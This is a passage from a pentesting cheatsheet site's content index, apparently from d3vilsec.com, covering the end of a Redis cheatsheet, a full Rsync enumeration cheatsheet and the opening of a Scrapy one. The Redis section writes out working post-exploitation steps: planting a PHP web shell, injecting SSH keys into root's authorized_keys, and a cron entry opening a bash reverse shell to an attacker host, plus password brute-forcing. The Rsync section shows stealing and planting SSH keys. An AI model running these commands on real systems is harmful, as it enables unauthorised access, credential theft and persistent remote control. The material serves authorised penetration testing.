style=\"color:#75715e\"\u003e# Current user (Redis 6+)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eACL LIST \u003cspan style=\"color:#75715e\"\u003e# Access control rules (Redis 6+)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"exploring-data\"\u003eExploring Data\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSELECT \u0026lt;n\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Switch DB index (default 0)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDBSIZE \u003cspan style=\"color:#75715e\"\u003e# Number of keys in current DB\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eKEYS * \u003cspan style=\"color:#75715e\"\u003e# List ALL keys (heavy on large DBs)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSCAN \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Cursor-based key iteration (safer)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRANDOMKEY \u003cspan style=\"color:#75715e\"\u003e# Return a random key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Inspect a key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTYPE \u0026lt;key\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Data type (string, list, set, hash, zset)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTTL \u0026lt;key\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Time to live\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Read by type\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGET \u0026lt;key\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# string\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eLRANGE \u0026lt;key\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -1 \u003cspan style=\"color:#75715e\"\u003e# list\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSMEMBERS \u0026lt;key\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# set\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHGETALL \u0026lt;key\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eZRANGE \u0026lt;key\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -1 \u003cspan style=\"color:#75715e\"\u003e# sorted set\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dump everything quickly\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; --scan | \u003cspan style=\"color:#66d9ef\"\u003ewhile\u003c/span\u003e read k; \u003cspan style=\"color:#66d9ef\"\u003edo\u003c/span\u003e echo \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e$k\u003cspan style=\"color:#e6db74\"\u003e =\u0026gt; \u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003e$(\u003c/span\u003eredis-cli -h \u0026lt;ip\u0026gt; GET \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e$k\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003e)\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e; \u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"authentication-notes\"\u003eAuthentication Notes\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check if auth is required\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; PING\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; PONG = no auth (open!)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; NOAUTH ... = password required\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e --script redis-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force with hydra\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -P /usr/share/wordlists/rockyou.txt redis://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"rce--post-exploitation-authorised-testing-only\"\u003eRCE / Post-Exploitation (Authorised testing only)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 1. Web shell via RDB write (if web root is writable \u0026amp; known)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dir /var/www/html\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dbfilename shell.php\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSET test \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u0026lt;?php system(\u003c/span\u003e$_GET\u003cspan style=\"color:#e6db74\"\u003e[\u0026#39;cmd\u0026#39;]); ?\u0026gt;\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSAVE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; browse to http://\u0026lt;ip\u0026gt;/shell.php?cmd=id\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 2. SSH key injection (if redis runs as a user with ~/.ssh writable)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eecho -e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\\n\\n\u0026#34;\u003c/span\u003e; cat id_rsa.pub; echo -e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\\n\\n\u0026#34;\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e \u0026gt; key.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -x SET sshkey \u0026lt; key.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dir /root/.ssh\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dbfilename authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSET sshkey \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;...\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSAVE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# -\u0026gt; ssh -i id_rsa root@\u0026lt;ip\u0026gt;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 3. Cron job injection (write to /var/spool/cron)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dir /var/spool/cron/crontabs\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG SET dbfilename root\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSET shell \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\\n\\n* * * * * bash -i \u0026gt;\u0026amp; /dev/tcp/\u0026lt;lhost\u0026gt;/\u0026lt;lport\u0026gt; 0\u0026gt;\u0026amp;1\\n\\n\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSAVE\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eModule loading (Redis 4.x/5.x):\u003c/strong\u003e \u003ccode\u003eMODULE LOAD \u0026lt;path\u0026gt;\u003c/code\u003e can load a malicious \u003ccode\u003e.so\u003c/code\u003e for RCE (e.g. RedisModules-ExecuteCommand / exp.so). Newer versions restrict this.\u003c/p\u003e","title":"Redis"},{"content":"Rsync Enumeration Cheatsheet Default Port: 873 (TCP)\nDetection nmap -p 873 \u0026lt;ip\u0026gt; nmap -p 873 -sV \u0026lt;ip\u0026gt; nmap -p 873 --script rsync-list-modules \u0026lt;ip\u0026gt; nc -nv \u0026lt;ip\u0026gt; 873 List Available Modules (Shares) # List modules (no auth) rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/ rsync rsync://\u0026lt;ip\u0026gt;/ # nc banner grab nc -nv \u0026lt;ip\u0026gt; 873 # Then type: #list Enumerate Files in a Module rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/subdir/ # Recursive listing of entire module rsync -r --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ Download Files # Download single file rsync rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/file.txt ./ # Download entire module rsync -av rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./local_copy/ # With credentials rsync -av rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./ rsync --password-file=pass.txt rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./ # Dry run (see what would be downloaded) rsync -av --dry-run rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./ Upload Files # Upload single file rsync -av ./shell.php rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ # Upload directory rsync -av ./payload/ rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/uploads/ # With password file rsync --password-file=pass.txt -av ./file rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ High-Value Paths to Check rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/home/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/root/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/etc/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/backup/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/var/www/ rsync -av --list-only rsync://\u0026lt;ip\u0026gt;/.ssh/ SSH Key Theft \u0026amp; Planting # Download .ssh directory rsync -av rsync://\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/ ./stolen_keys/ # Plant authorized_keys (if write access) rsync -av ~/.ssh/id_rsa.pub rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/authorized_keys Nmap Scripts nmap -p 873 --script rsync-list-modules \u0026lt;ip\u0026gt; ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/rsync/","summary":"\u003ch1 id=\"rsync-enumeration-cheatsheet\"\u003eRsync Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 873 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e --script rsync-list-modules \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"list-available-modules-shares\"\u003eList Available Modules (Shares)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List modules (no auth)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync rsync://\u0026lt;ip\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# nc banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Then type: #list\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"enumerate-files-in-a-module\"\u003eEnumerate Files in a Module\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/subdir/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Recursive listing of entire module\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -r --list-only rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"download-files\"\u003eDownload Files\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download single file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/file.txt ./\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download entire module\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./local_copy/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With credentials\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync --password-file\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003epass.txt rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dry run (see what would be downloaded)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --dry-run rsync://\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/ ./\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"upload-files\"\u003eUpload Files\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Upload single file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av ./shell.php rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Upload directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av ./payload/ rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/uploads/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With password file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync --password-file\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003epass.txt -av ./file rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/\u0026lt;module\u0026gt;/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"high-value-paths-to-check\"\u003eHigh-Value Paths to Check\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/home/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/root/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/etc/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/backup/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/var/www/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av --list-only rsync://\u0026lt;ip\u0026gt;/.ssh/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-key-theft--planting\"\u003eSSH Key Theft \u0026amp; Planting\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download .ssh directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av rsync://\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/ ./stolen_keys/\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Plant authorized_keys (if write access)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ersync -av ~/.ssh/id_rsa.pub rsync://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;/home/\u0026lt;user\u0026gt;/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e873\u003c/span\u003e --script rsync-list-modules \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"Rsync"},{"content":"Scrapy Cheatsheet Type: Fast, high-level web crawling and scraping framework for Python — used to build custom spiders that extract links, emails, subdomains, and other data from target sites\nInstallation # Via pip (recommended) pip3 install scrapy # Via apt sudo apt install python3-scrapy # Via conda conda install -c conda-forge scrapy # Verify scrapy version Basic Usage # Quick one-off crawl from the shell (no project needed) scrapy shell \u0026lt;url\u0026gt; scrapy shell https://example.com # Fetch a single page and dump to stdout scrapy fetch https://example.com # View the page as Scrapy sees it (opens in browser) scrapy view https://example.com # Run a standalone spider file scrapy runspider myspider.py Command-Line Tools Command Description scrapy startproject \u0026lt;name\u0026gt; Create a new project skeleton scrapy genspider \u0026lt;name\u0026gt; \u0026lt;domain\u0026gt; Generate a new spider from template scrapy crawl \u0026lt;spider\u0026gt; Run a spider inside a project scrapy runspider \u0026lt;file.py\u0026gt; Run a self-contained spider file scrapy shell \u0026lt;url\u0026gt; Interactive scraping shell (test selectors) scrapy fetch \u0026lt;url\u0026gt; Download a page using Scrapy\u0026rsquo;s downloader scrapy view \u0026lt;url\u0026gt; Open the fetched page in a browser scrapy parse 